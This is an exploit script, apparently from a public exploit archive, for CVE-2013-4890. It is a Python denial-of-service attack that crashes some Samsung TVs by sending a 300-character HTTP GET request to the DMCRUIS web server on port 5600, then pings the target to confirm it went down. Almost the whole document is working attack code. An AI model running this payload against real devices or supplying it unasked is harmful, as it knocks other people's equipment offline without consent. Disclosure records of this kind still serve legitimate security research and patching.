# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Date: 07/21/2013
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description: Resets some Samsung TVs
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# Tested successfully on my Samsung PS50C7700 plasma TV :)
import httplib
import sys
import os
print "***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description: Resets some Samsung TVs\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "***************************************************************************************\n"
# Sends the payload
print "Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
# Checks the response
print "Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print "Target down!\n"